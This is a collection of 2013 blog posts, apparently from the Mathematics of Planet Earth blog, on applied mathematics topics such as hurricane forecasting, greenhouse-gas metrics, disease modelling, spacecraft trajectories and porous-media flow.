    SAMSI Undergraduate Workshop -- Carl SchreckDr. Carl Schreck, from the Cooperative Institute for Climate and Satellites North Carolina, attended the presentations. The following are his comments about the workshop:

    “As an atmospheric scientist focused on the Tropics, participating in SAMSI’s recent Interdisciplinary Workshop for Undergraduates was a fascinating experience. Math and statistics students from all around the country were tasked with developing statistical models to predict the number of tropical storms and hurricanes that would make landfall in the United States this summer. My role was to give them an overview of how hurricanes form and how climate signals might be used to predict their seasonal activity. I was very impressed by the depth of the questions they asked me. Even though the material was outside of their comfort zones, they were clearly eager to embrace it.

    At the end of the workshop, each group of students presented their forecasts and methodologies. The climate signals they used as predictors are available as monthly averages going back to 1950. The students showed great innovation in how they average multiple months to stabilize predictors. Their solutions ranged from a simple average of the three most recent months to a 12-month weighted averaging scheme that put more emphasis on the most recent values.

    The students also showed great creativity in how they selected their predictor signals. Some chose predictors based on physical understanding of how they might affect hurricanes, while others let the data guide them to whatever predictors had the strongest statistical relationships. Their forecasts for 2013 ranged from 4 to 10 tropical storms making landfall this year, with the consensus or average around 6. I’m looking forward to seeing how well those forecasts verify!”

    Mr. Lee Richardson, a participant from the University of Washington at Seattle, shares his experience of the workshop:

    “I spent last week at North Carolina State University, at an undergraduate workshop that focused on modeling hurricanes that would hit America in 2013. I didn’t know what to expect going in, as this was the first workshop style event I have ever attended. The week turned out to be one of the most inspiring/interesting/helpful weeks of my life. Not only did we have very current data to address a significant real world problem, but the people I met were very interesting and helpful as well. It was refreshing to spend a week with people who were also passionate about statistics, and being able to ask post-docs and others for help whenever we got stuck looking at the data was invaluable.

    Another thing that was great about the workshop was how many prestigious, and successful people from the statistical/mathematical world were there to give us advice and talks on their research. Getting perspectives on the state of statistics, climate statistics, and graduate school from people who are very experienced in these fields was enlightening. While I already had spent a good amount of time reading about graduate school, I can safely say that after attending this workshop I am wholly more prepared to pursue statistics graduate school and very excited about being a part of the future of Statistics.”

    Dr. David J. Lawlor, a current post-doc at SAMSI, wrote:

    “This year’s undergraduate modeling workshop was a lot of fun for me. I always enjoy interacting with the undergrads who pass through SAMSI, who bring a level of enthusiasm and energy that I remember having when I was that age. It’s nice to be able to pass on advice to the next generation of math/stats students. I think the theme of this year’s program, hurricane prediction, was a great test case for the students to work on. The data are easy to understand and collect, and there were enough degrees of freedom in making modeling decisions that every group was able to do something different and defend their choices at the end of the workshop. I hope that this exposure to the research process will pique the interest of at least one student who might not otherwise have been considering graduate school in the mathematical and statistical sciences.”

    Ms. Kristin Linn, a SAMSI graduate fellow and a Ph.D. candidate at NCSU wrote:

    “I was impressed with the caliber of the undergraduates who attended the modeling workshop. I loved hearing students throughout the week say, `I’ve never considered graduate school, but now I must go. There’s so much more about statistics that I want to learn.’ My favorite part of the workshop was watching each group present their final results. It was obvious that the students found the hurricane data interesting and fun to work with, and the presentations were all engaging and informative. The students learned how to apply Poisson regression to predict hurricane counts given environmental predictors from previous years. Most groups used stepwise selection with an AIC or BIC criterion to build a model, and some groups wrote their own R code to assess their models using cross-validation. The workshop offered a unique experience that will inspire and benefit the students for years to come!”

    The workshop was part of the Mathematics of the Planet Earth 2013 (MPE2013) program at SAMSI.

    Snehalata Huzurbazar, Deputy Director of SAMSI
    Jamie Nunnelly, SAMSI’s Communications Director

    Posted in Natural Disasters, Statistics, Weather, Workshop Report | Leave a comment

    Measuring Carbon Footprints

    Releasing a ton of carbon dioxide into the atmosphere has quite a different effect on the global average temperature than releasing a ton of methane. Have you ever wondered how the effects of different greenhouse gases are compared? Designing appropriate metrics is nontrivial but essential for setting standards and defining abatement strategies to limit anthropogenic climate change, as was done for example in the Kyoto Protocol. Yes, we are talking about a “carbon footprint.” Do you know how it is defined?

    The standard unit for measuring carbon footprints is the Carbon dioxide equivalent (CO2e), which is expressed as parts per million by volume, ppmv. The idea is to express the impact of each different greenhouse gas in terms of the amount of CO2 that would create the same amount of warming. That way, a carbon footprint consisting of lots of different greenhouse gases can be expressed as a single number.

    Standard ratios are used to convert the various gases into equivalent amounts of CO2. These ratios are based on the so-called Global Warming Potential (GWP) of each gas, which describes its total warming impact relative to CO2 over a set period of time (the “time horizon,” usually 100 years). Over this time frame, according to the standard data, methane scores 25 (meaning that one metric ton of methane will cause the same amount of warming as 25 metric tons of CO2), nitrous oxide comes in at 298 and some of the super-potent greenhouse gases score more than 10,000.

    The adequacy of the GWP has been widely debated since its introduction. The choice of a time horizon is a critical element in the definition. A gas which is quickly removed from the atmosphere may initially have a large effect but for longer time periods becomes less important as it has been removed. Thus methane has a potential of 25 over 100 years but 72 over 20 years; conversely sulfur hexafluoride has a GWP of 23,900 over 100 years but 16,300 over 20 years. Relatively speaking, therefore, the impact of methane – and the strategic importance of tackling its sources, such as agriculture and landfill sites – depends on whether you’re more interested in the next few decades or the next few centuries. The 100-year time horizon set by the Kyoto Protocol puts more emphasis on near-term climate fluctuations caused by emissions of short-lived species (like methane) than by emissions of long-lived greenhouse gases. Since the GWP value depends on how the gas concentration decays over time in the atmosphere, and this is often not precisely known, the values should not be considered exact. Nevertheless, the concept of the GWP is generally accepted by policy makers as a simple tool to rank emissions of different greenhouse gases.

    Posted in Atmosphere, Climate Change | Leave a comment

    Using Mathematics to Understand, Detect, and Predict Biological Events in Our Water Systems

    In coastal ocean, estuary, and lake systems, there is much interest in understanding, detecting, and predicting biological events such as harmful algal blooms. This requires a combination of numerical modeling and observation from both the ground and the air.

    Mathematical modeling of the biology and chemistry, both simplified and complex, is a rich and active area of research, but the predictive accuracy of these models is often degraded by the accuracy of hydrodynamic inputs such as temperature, salinity, and currents. These fields can come from both numerical models and from observations. Models that numerically solve the (incompressible, typically hydrostatic) Navier-Stokes equations have the advantage of providing all variables at any specified time and location. The downside in the ocean is the same as it is in the atmosphere: all models have errors and those errors can lead to significant errors in the model results. Observations, either in situ or remote, sample the real system, but typically only at infrequent times and over a fraction of the domain of interest. Satellite images, for example, can only observe certain surface variables, are limited by cloud cover, and are inaccurate near the coast.

    Some of these issues can be addressed through a process that has been mentioned a few times in this blog: data assimilation. At a simple level, data assimilation can be thought of as an interpolation of both observational data and model predictions, where each piece is weighted by its uncertainty. Where no observations exist the model can give reasonable estimates, while observations can be used to move the model fields closer to the true state. This process is used to improve initial conditions at all of the major operational weather centers in the world for the purpose of forecasting. In the ocean, error in the boundary conditions is often a larger source of error than chaos, but data assimilation can still improve results through improving the initial conditions. This is something that I have worked on in the Chesapeake Bay [1] to produce more accurate flow fields that can be used for driving biological and chemical models.

    Data assimilation can incorporate satellite observations, but the satellite observations themselves warrant some consideration. Satellite temperature observations are available, but satellites do not actually observe temperature directly. Instead, radiation given off by the ocean and passed through the atmosphere is recorded (the observation is known as a radiance). These values are turned in to temperatures through what is mathematically an inverse problem. This inverse modeling requires some knowledge of the physical relationship between the desired quantity (in this case temperature) and the emitted radiation. This relationship is less clear when the desired quantity is something like an abundance of algae.

    As an alternative to the inverse modeling, statistical models can be developed by using satellite radiances as predictors for some quantity observed in situ. One example is using this to estimate salinity values in Chesapeake Bay [2], but this type of statistical modeling can also be used to predict other quantities, such as biology. This is done experimentally in the Chesapeake Bay for sea nettles.

    What’s Next? Mathematicians are working on enhancing the utility of these types of models with the long-term goal of guiding environmental and public health officials making policy decisions.

    [1] Hoffman, M.J., T. Miyoshi, T. Haine, K. Ide, R. Murtugudde, and C.W. Brown. 2012. Advanced data assimilation system for the Chesapeake Bay. J. Atmos. and Oceanic Tech., 29, 1542-1557, 10.1175/JTECH-D-11-00126.1.

    [2] Urquhart, E, M.J. Hoffman, B.F. Zaitchik, S. Guikema, and E.F. Geiger. 2012. Remotely Sensed Estimates of Surface Salinity in the Chesapeake Bay. Remote Sensing of the Environment., 123, 522-531, doi: 10.1016/j.rse.2012.04.008.

    Matthew J. Hoffman and Kara L. Maki
    School of Mathematical Sciences
    Rochester Institute of Technology

    Posted in Biology, Data Assimilation, Mathematics | Leave a comment

    Neglected Tropical Diseases — and how mathematics can help

    You might have heard of a group of diseases called the “Neglected Tropical Diseases”. This isn’t just a generic title for all the forgotten diseases in the world; it’s a specific designation on behalf of the World Health Organization for 13 particular diseases that qualify for neglected status. Collectively, these diseases infect about one sixth of the world’s population.

    The diseases in question include three types of worm (hookworm, roundworm and whipworm), a number of helminths (elephantitis, river blindness, Guinea worm disease and schistosomiasis), protozoans (leishmaniasis, Chagas’ Disease, sleeping sickness) and bacterial infections (the Buruli ulcer, leprosy and trachoma). Approximately 4.2 billion people — more than half the population of the Earth — are at risk for hookworm alone, with 807 million currently infected.

    What characterizes these particular diseases isn’t that — unlike more sensational diseases like HIV/AIDS, malaria and TB — they kill huge numbers of people (about 530,000 people per year, although that’s still not nothing). Instead, they’re responsible for massive levels of disfigurement and disability, impairing childhood development and economic productivity. They’re found in every tropical country (including Australia) and yet are neglected at the community, national and international levels, largely because they affect the poor, the powerless and the stigmatised.

    For example, Chagas’ disease kills 50,000 people a year (far more than West Nile virus, Bird Flu and swine flu combined), but you probably haven’t heard of it because it’s a disease of the poor. If your house is made of sticks, the bugs that carry the disease burrow through your walls and bite you under the eye. But if you can afford plaster, then you’re completely safe. So it’s a widespread disease in poor, rural South America (where the average life of a dog is about two years, thanks to the disease), but doesn’t kill anyone who might be in a position to lobby governments, advocate for medical interventions or mobilize advertising campaigns.

    Rather than simply count deaths, the World Health Organization has developed a measure of the number of years of life lost from premature death or disability, or DALYs (Disability-Adjusted Life Years). The number of DALYs per year for HIV/AIDS is 84.5 million. That is, without HIV/AIDS we’d have about 84,500,000 years of healthy life back. But NTDs are collectively the next largest burden on the world, with DALYs of 56.6 (diarrhoeal diseases are third, followed by childhood and vaccine preventable diseases, then malaria and TB). So despite being neglected, the NTDs are one of the largest problems human beings face today.

    Treatments exist for some NTDs, although often control occurs through less “sexy” methods, such as mass dewormings in schools, insecticides, safe water and, in some cases, arsenic and amputation. (Seriously. Arsenic is still used to treat sleeping sickness, while the only treatment for the Buruli ulcer is to amputate infected limbs. NTDs ain’t pretty.) Part of the problem is that there’s no money in them: why would a profit-driven pharmaceutical company waste time developing treatments for diseases whose sufferers can’t pay? Of the 1600 drugs developed between 1974 and 2004, only 18 were for tropical diseases (and 3 for TB).

    So what’s to be done? Fortunately, there are a couple of success stories. Guinea worm disease has been all but eliminated, despite having no vaccine, no drug and no immunity. Instead, behavior changes (convincing people not to put infected limbs in the water, distributing cloth filters to villages and outfitting nomadic people with drinking pipes) have led to a massive reduction in cases and already eliminated the disease from Asia and the Middle East.

    Who made this miraculous feat happen? It’s thanks to the efforts of one man: former president Jimmy Carter, who did the unglamorous but important work of mobilizing public-private partnerships, delivering education messages to remote populations and even negotiating a “Guinea worm ceasefire” in the Sudan civil war so that NGOs could go in and educate those most at risk. As a result, Guinea worm disease has been almost eradicated from the planet. It’s not only going to be the first parasitic disease to be eradicated, it’s also going to be the first to be eliminated using behavior changes alone. That’s an incredible achievement.

    Another success story is river blindness, and this is where mathematical modelling comes into the picture. The West African river blindness program was developed as a co-production between the World Health Organization, the World Bank, the UN, and 20 donor countries and agencies in 1974. Mathematical modelling was used at the outset to predict long-term outcomes; by including modelling in the design of the program, sceptical donors were convinced that control was feasible. When the drug ivermectin was made available in the late eighties, mathematical models were able to adapt to its inclusion. After the program was completed, modelling retained a prominent role in subsequent policy discussions.

    One of the great advantages of mathematical modelling is that it’s cheap. A lot can be done with a little, so many potential scenarios can be investigated even when data is limited. In a way, this makes NTDs an ideal subject for modelling to tackle. There are a great many problems that urgently need to be solved that mathematical models could help with.

    Unfortunately, the NTDs are as neglected by modelling as they are by everyone else. Only sleeping sickness has received any substantial theoretical modelling. There are no models at all for the Buruli ulcer and only one for Guinea worm disease. When models do exist for NTDs, they’re usually confined to one lab and its collaborators per NTD. What we urgently need is a diversity of voices.

    Specific problems might include adapting malaria pesticide models for vector control in Chagas’ disease or leishmaniasis. Spatial modelling is critical: access to resources depends critically upon geographical constraints, so models that accounts for distance to hospitals, swamps, mountains and road networks are crucial. Co-infection models — between other NTDs and also major diseases like HIV — are also desperately needed.

    Modelling could also help categorize the costs to developing economies of disabling NTDs: if treating NTDs is shown to save more money than it costs in productivity, this will help motivate action. Another, slightly meta, approach might be to model research funding itself: if granting agencies are requiring researchers to provide “at home” benefits, this could be standing in the way of significant work on diseases that might help a very large number of people.

    In summary, NTDs require immediate attention. They extract an enormous price in suffering, lack of economic development and the promotion of poverty. Mathematical models can be used to inform policy at minimal cost, solving problems that may not be theoretically complex, but which have the potential to deliver enormous benefits.

    NTDs are the low-hanging fruit of mathematical modelling. A great many problems could be solved, relatively easily, by harnessing the power of mathematical modelling. The price — political and otherwise — for such a huge improvement in the quality of life for one sixth of the world’s population is tiny.

    Robert Smith?
    The Department of Mathematics
    The University of Ottawa
    585 King Edward Ave
    Ottawa, ON K1S 0S1
    Canada

    Posted in Disease Modeling, Mathematics, Public Health | 1 Comment

    Report: The Mathematical Sciences in 2025

    The full report on The Mathematical Sciences in 2025 from the National Academies Press is now available for download.

    The report analyzes the current state of various fields under the umbrella of the mathematical sciences, presenting ideas to ensure that the discipline remains in a strong position, and is capable of maximizing its contributions to the nation in 2025. The report recommends the reassessment of training for future generations of mathematical scientists in light of the growing cross-disciplinary nature of the field. Download the full report at the link above.

    Posted in General, Mathematics, Statistics | Leave a comment

    AIM Workshop: Nonhomogeneous boundary-value problems for nonlinear waves

    This week at AIM features a MPE related workshop concerned with boundary-value problems for nonlinear dispersive evolution equations and systems. The workshop is organized by Jerry Bona, Min Chen, Shuming Sun, and Bingyu Zhang and has participants with diverse interests in both the pure and applied aspects of such problems.

    Nonlinear, dispersive evolution equations and systems of such equations arise as models for wave motion in a very wide variety of physical, biological and engineering. Since the 1960’s, there has been a steady increase of interest in the theory and applications of such equations. On the mathematical side, the pioneering work of Ginibre and Velo and Kenig, Ponce and Vega was followed by the spectacular progress of Bourgain, Tao and their collaborators, as well as many others.

    If one tries to use the pure initial-value formulations in practice, one is immediately beset by the difficulty of determining accurately a wave profile in the entire spatial domain of its definition at a single instant of time. Generally speaking, this is not possible to accomplish with any semblance of accuracy. Moreover, when these equations are used in engineering and science, the natural way to pose them is with specified, not necessarily homogeneous boundary conditions. And, problems of control of dispersive equations demand a firm grasp of boundary-value problems as a starting point for developing cogent theory.

    By contrast with the initial-value problem, theory for boundary-value problems other than those featuring periodicity has generally lagged behind the developments for the pure initial-value problems. The overall goal of the workshop is to advance the study of boundary-value problems for nonlinear dispersive wave equations. Some specific topics that are being considered are:

    1. Investigating the smoothing properties enjoyed by solutions of boundary-value problems and associated well-posedness theory.

    2. Investigating the controllability and stabilizability of solutions of nonlinear, dispersive wave equations. Experience shows that results from the first topic above will be central to such an investigation.

    3. Extending the theory to multi-space dimensional problems arising in geophysical applications such as coastal dynamics and elsewhere.

    Estelle Basor
    AIM

    Posted in Mathematics, Workshop Report | Leave a comment

    2013 SIAM Conference on Applications of Dynamical Systems

    The 2013 SIAM Conference on Applications of Dynamical Systems (DS13) will be held at the Snowbird Ski and Summer Resort, Snowbird, Utah, May 19-23. Co-chairs of the Organizing Committee are Charlie Doering (U Michigan, Ann Arbor) and George Haller, ETH Zurich, Switzerland). As of May 14, the meeting has 707 pre-registered participants, attendance is expected to exceed 800. The program features 9 invited presentations, 136 minisymposium sessions, 191 contributed papers, and 88 contributed posters. Nancy Kopell (Boston U) will deliver the Jurgen Moser Lecture, and the SIAM Activity Group on Dynamical Systems (SIAG/DS) will present the J.D. Crawford prize to Panayotis Kevrekidis (U Massachusetts, Amherst).

    This year’s Snowbird meeting will host a Featured Minisymposium on “Dynamics of Planet Earth” as part of MPE2013. The Featured Minisymposium (MS38) is organized by Hans Kaper, chair of the SIAG/DS, and will take place on Monday, May 20, 2:30 p.m. – 4:45 p.m., in Ballroom I.

    The minisymposium will feature an overview talk by the organizer and four talks on specific applications of dynamical systems and bifurcation theory to the Earth’s climate system. Chris Danforth (U Vermont) will demonstrate a novel method for improving forecasts during integration of a weather model. Mary Silber (Northwestern U) will discuss tipping points in the context of bifurcation theory, using case studies of possible tipping points in models of Arctic sea-ice retreat and desertification. Marty Anderies (Arizona State U), who is interested in land use and the carbon cycle, will explore the relationship between nonlinear dynamics and planetary boundaries. Mary Lou Zeeman (Bowdoin College and Cornell U) will focus on issues of sustainability and will explore how a decision-support viewpoint may inspire new questions for dynamical systems.

    The biennial Snowbird meetings offer a unique opportunity to learn about the application of dynamical systems theory to areas outside of mathematics. These application areas are diverse and multidisciplinary, ranging over all areas of applied science and engineering, including biology, chemistry, climate, geophysics, physics, finance, and industrial applied mathematics. This conference strives to achieve a blend of application-oriented material and the mathematics that informs and supports it. The goals of the meeting are a cross-fertilization of ideas from different application areas, and increased communication between the mathematicians who develop dynamical systems techniques and applied scientists who use them.

    Posted in Climate, Conference Announcement, Energy, Mathematics, Sustainability, Weather | Leave a comment

    Low Fuel Spacecraft Trajectories to the Moon

    A recent blog entry discussed why celestial mechanics is a part of the focus of the MPE2013. Here I suggest a further argument in favor of this inclusion and call attention to some recent events and mathematical ideas in connection with explorations beyond planet Earth.

    There is widespread interest in finding and designing spacecraft trajectories to the Moon, Mars, other planets, or other celestial bodies (comets, asteroids), which require as little fuel as possible. This is justified mostly by the cost of the missions: each extra pound of load for a spacecraft roughly costs 1 million dollars. Hence, for robotic space missions, which typically conduct numerous observations and measurements over long periods of time, in order to maximize the equipment load, it is imperative to minimize the fuel consumption of the propulsion system. One way to achieve this is to cleverly exploit, in a mathematically explicit way, the gravitational forces of the Earth, Moon, Sun, etc.

    To illustrate the concept, suppose that one would like to design a low-energy transfer from the Earth to the Moon. Of course, first one has to place the spacecraft on some orbit around the Earth, which is unavoidably energy expensive. Surprisingly though, the second leg of the trajectory, to take the spacecraft from near the Earth to some prescribed orbit about the Moon, can be done at a low energy cost (in theory, even for free). Say that we would like to insert the spacecraft at the periapsis of an elliptic orbit about the Moon, of prescribed eccentricity and at some prescribed angle with respect to the Earth-Moon axis. We would like to do that without having to slow down the spacecraft at the arrival (or maybe just a little), thus saving the fuel necessary for such an operation. Imagine that we run the “movie” of the trajectory backwards, from the moment when the spacecraft is on the elliptic orbit. Since the eccentricity is fixed, the semi-major axis determines the velocity of the spacecraft at the periapsis. If the semi-major axis is too short (or, equivalently, the velocity is too low) the trajectory will turn around the Moon without leaving the Moon region; such a trajectory is redeemed as ‘stable’. By gradually increasing the semi-major axis (hence, the velocity), one will find a trajectory that leaves the Moon region and makes a transfer to the Earth region; such a trajectory is redeemed as ‘unstable’. See Fig. 1.

    Stable and unstable trajectories

    Fig. 1. Stable and unstable trajectories; P1 denotes the Earth and P2 the Moon.

    The critical values of the semi-major axis which delineates the stable motions from the unstable ones are called “weak stability boundary” points. Exploring all angles of insertion and all values of the eccentricity of the elliptical orbit yields a “weak stability boundary” set; this appears to be some sort of a fractal. See Fig. 2.

    Weak Stability Boundary

    Fig. 2. Weak Stability Boundary.

    All points in the weak stability boundary correspond to arrival points of low energy transfers from the Earth to the Moon. The spacecraft trajectories designed by this method yield fuel savings of 10-15%.

    The notion of a weak stability boundary was introduced by Edward Belbruno (Princeton University) in 1987; a documentary trailer on the discovery of this concept can be found on YouTube. The method was successfully applied, for the first time, for the rescue of the Japanese lunar mission Hiten in 1991. The recent mission GRAIL (Gravity Recovery and Interior Laboratory) of NASA, which took place in 2012, used the same transfer as Hiten. The purpose of this mission was to obtain a high-resolution mapping of the gravitational field of the Moon. For this purpose, two spacecrafts were placed on the same orbit about the Moon, and their instruments measured the changes in the relative velocity very precisely; such changes were translated into changes of the gravitational field. (This technique had been tested previously for the mapping of Earth’s gravity, as a part of the mission GRACE – Gravity Recovery and Climate Experiment – a joint mission of NASA and the German Aerospace Center, since 2002.) A key point for the GRAIL mission was to place the two spacecrafts on precisely the same lunar orbit; the weak stability boundary concept was quite suitable for this purpose.

    A deeper understanding of the weak stability boundary can be achieved from studying hyperbolic invariant manifolds. The motion of a spacecraft relative to the Earth-Moon system can be modeled through the three-body problem. In this model, the intertwining gravitational fields of the Earth and the Moon determine some “invisible pathways,” called stable and unstable manifolds, on which optimal transport is possible. These manifolds have been found in the works of Henri Poincaré. It turns out, surprisingly, that these manifolds are deeply related to the weak stability boundary. More precisely, under some energy restriction, it can be geometrically proved that the weak stability boundary points lie on certain stable manifolds.

    Here are some recent references:
    Belbruno, E.; Gidea, M; Topputo, F. Weak stability boundary and invariant manifolds. SIAM J. Appl. Dyn. Syst. 9 (2010), no. 3, 1061–1089.
    Belbruno, E.; Gidea, M.; Topputo, F. Geometry of Weak Stability Boundaries. Qual. Theory Dyn. Syst. 12 (2013), no. 1, 53–66.

    Marian Gidea

    School of Mathematics
    Institute for Advanced Study
    Princeton
    
and
    
Department of Mathematics
    Northeastern Illinois University
    Chicago

    Posted in Astrophysics, Mathematics | Tagged | Leave a comment

    Discontinuous Pressure in Coupled Flows

    Pressure is an important property of fluid flow, and it is known that the pressure changes continuously in the fluid domain. In the coupling of flows of different nature, however, the situation can be more complicated and discontinuities may appear in the pressure field. This is the case, for example, in coupled free flows and flows in porous media. There has been a recent surge of interest in modeling and simulating these multi-physics problems. Coupled flows arise, for instance, in groundwater flow, where chemical contaminants leak in rivers or lakes and reach the porous rock at the bottom.

    The mathematical model is a domain-based coupled system of Stokes equations with Darcy’s law describing the rate at which a fluid flows through a permeable medium. An important part of the modeling problem is the choice of the conditions at the interface between the free flow region and the porous medium.

    A first condition states that the normal component of the velocity must be continuous across the interface. A second condition, referred to as the Beavers-Joseph-Saffman law, relates the tangential component of the free flow velocity with its shear stress. The latter law was derived from simple experiments of laminar tangential flows over a porous bed and was confirmed by homogenization technique for periodic porous media with circular pores [1,2,3]. A third interface condition involving the pressure of the fluid remained controversial until quite recently. Some scientists claimed that the pressure in the free flow must be continuous and equal to the Darcy pressure at the interface, while others claimed that there must be a jump in the pressure. Two recent works by Mikelic and co-authors [4,5] show theoretically and numerically that the pressure is discontinuous across the interface and that the pressure jump is proportional to the free fluid shear. It is interesting to note that if the pores of the media are isotropic (circular), the discontinuity in the pressure vanishes.

    Does this contradict the physical law of continuous pressure? No. The fluid pressure in the pores remains continuous. The pressure that appears in Darcy’s law is an average of the physical pressure of the fluid in the pores over a representative elementary volume. At the micro-scale, there is no real interface between the free flow and porous media. At the macro-scale, for general porous media, the continuum pressure is discontinuous across the interface, and the interface itself is part of the model.

    There are still many open questions related to the coupled free flows and porous media problem. An interdisciplinary effort combining analytical, experimental and numerical techniques is a key to gain a significant understanding of these coupled flows. For those interested in this problem, there will be a whole session dedicated to the modeling of these interface conditions at the 5th International Conference on Porous Media & Annual Meeting organized this month in Prague.

    [1] G.S. Beavers and D.D. Joseph, Boundary conditions at a naturally permeable wall, J. Fluid Mech., 30, p.197-207, 1967.
    [2] P.G. Saffman, On the boundary condition at the interface of a porous medium, Studies in Applied Mathematics, 1, p. 93-101, 1971.
    [3] W. Jager, A. Mikelic, On the interface boundary conditions by Beavers, Joseph and Saffman, SIAM J. Appl. Math., 60, p. 1111-1127, 2000.
    [4] A. Marciniak-Czochra, A. Mikelic, Effective pressure interface law for transport phenomena between an unconfined fluid and a porous medium using homogenization, SIAM Multiscale modeling and simulation, 10, p. 285-305, 2012.
    [5] T. Carraro, C. Goll, A. Marciniak-Czochra, A. Mikelic, Pressure jump interface law for the Stokes-Darcy coupling: confirmation by direct numerical simulations, preprint arXiv:1301:6580 [math.NA], 2013.

    Beatrice Riviere
    Associate Professor
    Department of Computational and Applied Mathematics
    Rice University
    riviere@rice.edu

    Posted in Geophysics, Mathematics | Leave a comment

    SIAM News — Examining the Dynamics of Ocean Mixing

    “The science is clear,” climate scientist Emily Shuckburgh told an audience of nearly 800 people at San Francisco’s Palace of Fine Arts on March 4. “Our collective actions have generated a climate problem that threatens our future and our children’s future.” Shuckburgh’s talk was part of the Mathematics of Planet Earth 2013 Simons Public Lecture Series.

    So begins the SIAM News article by Erica Klarreich, Examining the Dynamics of Ocean Mixing (SIAM News, May 1, 2013). The text of the full article may be found here.

    Posted in Climate, Ocean | Leave a comment

    Workshop “Major and Neglected Diseases in Africa,” May 6-10, 2013

    A workshop on “Major and Neglected Diseases in Africa” was held at the University of Ottawa, May 6-10, 2013. This workshop brought together researchers, experts and students from public health, disease modelling, and medicine who study the effects of diseases in African populations. Participants and speakers came from Africa, Europe, and the Americas.

    Africa is a continent that has been and still is being plagued with infectious diseases. Most notably are the current epidemics caused by HIV, Tuberculosis and Malaria. But there are many other diseases, both treatable and preventable, that also affect African populations. The workshop focused on HIV, Tuberculosis, Malaria, Polio, Neglected Tropical Diseases and surveillance. One day was devoted to each of the “big three” (HIV, Tuberculosis and Malaria) and two days to Neglected Tropical Diseases, Polio, surveillance, and a discussion of the effects of disease on children. Each day featured four plenary talks and two discussion sessions. In the discussion sessions, participants identified gaps in our knowledge and discussed the role of mathematical modelling in the particular theme areas. A group of researchers will follow through on these discussions and initiate a new collaborative network.

    The objectives of the workshop were:
    (a) To combine the expertise of public health officials and researchers in biology and the mathematical sciences in the areas of infectious diseases relevant to Africa;
    (b) To encourage and seek participation of African colleagues, to foster collaborations between Canadian and African researchers;
    
(c) To compare public health policies and experiences, helping all participants develop a better understanding of this difficult yet crucial aspect; and
    
(d) To train junior researchers, postdoctoral fellows and graduate students.

    The organizers of this workshop were Jane Heffernan (York University) and Julien Arino (University of Manitoba), both affiliated with the Centre for Disease Modelling at York University.

    More information regarding the workshop can be found here.

    Note added by the editor:
    A post on Neglected Tropical Diseases by Robert Smith? is scheduled for publication on the MPE2013 Daily Blog on May 18, 2013.

    Posted in Disease Modeling, Epidemiology, Public Health, Workshop Announcement | Leave a comment

    Of Cats and Batteries

    What do cats and batteries have in common? Not much, you might think. After all, cats are cuddly and purr. Batteries? They power your flashlights and cellphones, but no one wants a battery sitting on their lap while they watch TV.

    Cats were the subject of a recent, surprising news item. A group of computer scientists at Google and Stanford University fed YouTube videos to a computer that was running a “machine learning” program. This program “trains” on the input to find clusters of similar images and once it’s trained, the computer can classify new images as belonging to one of the clusters. After training on images from ten million YouTube videos, the computer learned to reliably identify images of cats. Like a newborn baby, the computer started with no knowledge but learned to identify objects – in this case cats – based on what it had already seen. This exercise illustrates the ability of machine learning to enable recognition tasks such as speech recognition, as well as classification tasks such as identifying cat faces as a distinct category of images.

    Batteries deserve attention on this website because of their essential role in any strategy for sustainable energy. Batteries are a primary means for storing, transporting and accessing electrical energy. For example, they provide storage of excess energy from wind and solar sources and enable electrical power for cars and satellites. Today’s hybrid and electric vehicles depend on lithium-ion batteries, but the performance of these vehicles is limited by the energy density and lifetime of these batteries. To match the performance of internal combustion vehicles, researchers estimate that the energy density of current batteries would need to increase by a factor of 2 to 5.

    Strategies for achieving these gains depend on identifying new materials with higher energy densities. The traditional method for finding new materials is to propose a material based on previous experience, fabricating the new material and measuring its properties, all of which can be expensive and time consuming. More recently, computational methods, such as density functional theory, have been used to accurately predict the properties of hypothetical materials. This removes the fabrication step but can involve large-scale computing. Although both of these methods have produced many successful new materials, the time and expense of the methods limit their applicability.

    Cats – more precisely, the machine learning program that recognized cats – could come to the rescue. Instead of watching YouTube videos, a machine learning method could train on existing databases (from both experiment and computation) of properties for known materials and learn to predict the properties for new materials. Once the machine learning method is trained (which can be a lengthy process), its prediction of material properties should be very fast. This would enable a thorough search through chemical space for candidate materials. Machine learning methods have not yet been used for finding materials for batteries, but they have been used for prediction of structural properties, atomization energies, and chemical reaction pathways. Their use in materials science is growing rapidly, and we expect that they will soon be applied to materials for batteries and other energy applications.

    Russ Caflisch, Director
    Institute for Pure & Applied Mathematics (IPAM)

    Posted in Energy, Machine Learning | Leave a comment

    Guinea Worms, the Carter Center, and Mathematics

    A couple of weeks ago I saw former president Jimmy Carter on the Daily Show. The story he told Jon Stewart was nothing short of amazing. Through persistent efforts over the past twenty-five years, his foundation has essentially eradicated guinea worm disease. In 1986 there were literally millions of cases each year in Africa and Asia whereas so far in 2013 there have been only 7 reported cases.

    Guinea worms are a parasite that humans acquire by drinking unclean water. The worms can grow to several feet in length then painfully emerge from the body basically any way they can.

    Carter’s foundation invented a strainer made of a fine material — something like parachute silk. They manufactured enough of these sieves to distribute to every afflicted village. That was the easy part. Then they had to persuade people to drink the water from their ponds only after straining it through the sieve. One major issue they encountered was that sometimes the local people regarded the pond water as holy and didn’t want to cause offense to the powers that be by introducing a foreign device. It was necessary to convince people almost literally one-by-one that the worms were basically aliens that had invaded the holy water and it was ok to strain them out.

    You are probably asking, “Where is the mathematics in here?” I see several analogies. One is that the solution was counterintuitive and was arrived at only after many trials and many errors. Also, the solution, or variations of it, had to be applied on a case-by-case basis, not unlike the case-by-case analysis that is present in many mathematical proofs, such as the proof of the 4-color theorem or of Kepler’s conjecture. The solution also required the sustained collaborative effort of many individuals to go to each village and make the necessary arguments that would persuade the villagers to behave in an unfamiliar and even abhorrent way that was not part of their culture. I also see elements of the logistical analysis of operations research in the solution here. The exact steps have to be carried out in the right order.

    The Carter Center’s persistence in developing a solution and carrying it out over a 25-year period also reminds me of the dogged determination that many mathematicians exhibit in the relentless pursuit of a solution that many would have earlier given up on. Finally, I see the success of a large-scale collaborative effort, which reminds me of some ongoing large-scale collaborative mathematical efforts requiring the cooperation of thousands of individuals, such as finding new Mersenne primes, or verifying that trillions zeros of the Riemann zeta-function are all on the critical line, or Tim Gowers’ polymath projects.

    To see the clip of Jimmy Carter on the Daily Show, click here.

    I also recommend this article about guinea worms.

    Posted in General, Mathematics, Public Health | Leave a comment

    Management of Variability and Uncertainty in Energy Systems

    An interesting collection of web videos from the Energy Systems Week at the Isaac Newton Institute.

    The meeting made progress with some of the difficult problems now arising in large electrical energy networks and concerned with the management of variability and uncertainty in these systems.

    Posted in Energy, Uncertainty Quantification | Leave a comment

    Fields Institute — Focus Program on Commodities, Energy, and Environmental Finance

